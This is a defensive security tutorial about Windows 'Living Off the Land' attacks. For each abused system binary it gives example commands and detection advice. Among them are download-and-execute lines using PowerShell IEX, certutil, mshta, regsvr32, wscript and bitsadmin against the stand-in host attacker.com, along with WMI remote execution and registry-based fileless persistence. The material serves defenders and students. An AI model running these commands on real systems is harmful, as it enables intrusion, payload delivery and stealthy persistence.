Living Off the Land (LotL) attacks use legitimate system tools — already installed on every Windows machine — to execute malicious actions. Because attackers use trusted system binaries, traditional signature-based antivirus often misses these attacks entirely. Understanding them is essential for both defenders and security students.
Why Living Off the Land?
Traditional attacks drop malware executables on disk. Modern EDR (Endpoint Detection & Response) tools catch these quickly via:
- File signature matching
- Behavioral analysis of new executable files
- Hash blocklists
LotL avoids this: no new files dropped, no signatures to match. Attackers chain together existing Windows utilities to download, execute, and persist code. The LOLBAS project (lolbas-project.github.io) catalogs hundreds of such binaries.
Common LOLBAS Techniques
PowerShell
PowerShell is the attacker’s Swiss Army knife — it can download files, execute code in memory, interact with COM objects, and bypass execution policy.
# Download and execute in memory (no file on disk)
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')
# Base64-encoded payload (common obfuscation)
powershell -enc BASE64ENCODEDCOMMAND
# Bypass execution policy
powershell -ExecutionPolicy Bypass -File script.ps1
Detection: PowerShell logging (Module Logging, ScriptBlock Logging) captures all commands. Enable via Group Policy or registry. AMSI (Antimalware Scan Interface) can scan PowerShell before execution.
CertUtil
Windows certificate utility — also a full-featured downloader and base64 encoder:
# Download a file
certutil -urlcache -f http://attacker.com/payload.exe C:\Windows\Temp\payload.exe
# Base64 decode a payload
certutil -decode encoded.txt payload.exe
Detection: CertUtil creating files in temp directories or making HTTP connections is highly suspicious — it should almost never do this in normal use.
MSHTA
Runs HTML Applications (.hta files) — can execute VBScript or JScript:
mshta http://attacker.com/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c calc"":close")
Detection: MSHTA connecting to external URLs or running from scripts is malicious. Block MSHTA entirely via AppLocker if it’s not needed.
Regsvr32
Registers COM servers — but also executes script:
# Execute remote scriptlet (squiblydoo technique)
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
Detection: Regsvr32 with /i: pointing to a URL is a significant IOC. Baseline: regsvr32 normally operates on local DLLs.
WScript / CScript
Windows Script Host executes VBS and JS files:
wscript.exe http://attacker.com/payload.vbs
cscript.exe //nologo malicious.js
Detection: WScript/CScript running from Downloads folder, temp directories, or with network URIs is suspicious.
BITSAdmin
Background Intelligent Transfer Service — designed for Windows Update downloads, abused for C2:
# Download payload
bitsadmin /transfer job http://attacker.com/payload.exe C:\payload.exe
# Persistent download + execute
bitsadmin /addfile job http://attacker.com/payload.exe C:\Windows\Temp\p.exe
bitsadmin /SetNotifyCmdLine job "C:\Windows\Temp\p.exe" NUL
bitsadmin /resume job
Detection: BITS jobs to external IPs, BITS service creating executables.
MSBuild
.NET build tool that can compile and execute C# code:
msbuild.exe malicious.proj
The project file contains C# code that runs during the build process — effectively a C# code executor disguised as a build tool.
Detection: MSBuild running from non-development directories or by non-developer users is suspicious.
WMI (WMIC / PowerShell WMI)
Windows Management Instrumentation enables remote execution and persistence:
# Remote code execution
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c payload"
# WMI persistence (survives reboot, no files needed)
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{...}
Detection: WMI subscriptions in root\subscription namespace are a persistence red flag. Windows Defender Credential Guard and WMI monitoring via Sysmon EventID 19/20/21.
Fileless Malware via Registry
Attackers store payloads in the registry and execute them:
# Store base64 payload in registry
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Update" -Name "Helper" -Value "BASE64PAYLOAD"
# Scheduled task to execute from registry
schtasks /create /sc onlogon /tn "Update" /tr "powershell -nop -w hidden -enc $(Get-ItemProperty HKCU:\Software\Microsoft\Update -Name Helper).Helper"
Detection: Scheduled tasks referencing registry values, encoded PowerShell commands.
Detection Strategy
Enable Logging
# Enable PowerShell ScriptBlock Logging (detects most PS attacks)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Enable Command Line Audit Logging
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
Sysmon
Deploy Sysmon (Microsoft Sysinternals) for detailed process creation, network connection, and file creation logging. Use the SwiftOnSecurity sysmon config as a starting baseline.
Application Control
Use AppLocker or Windows Defender Application Control (WDAC) to:
- Block MSHTA, WScript, CScript from running outside Windows directories
- Block BITSAdmin from making external connections
- Allowlist MSBuild to only run from legitimate development environments
MITRE ATT&CK Mapping
These techniques map to MITRE ATT&CK framework tactics:
- T1059: Command and Scripting Interpreter
- T1218: System Binary Proxy Execution
- T1197: BITS Jobs
- T1047: WMI
Use the ATT&CK framework to track your detection coverage for each technique.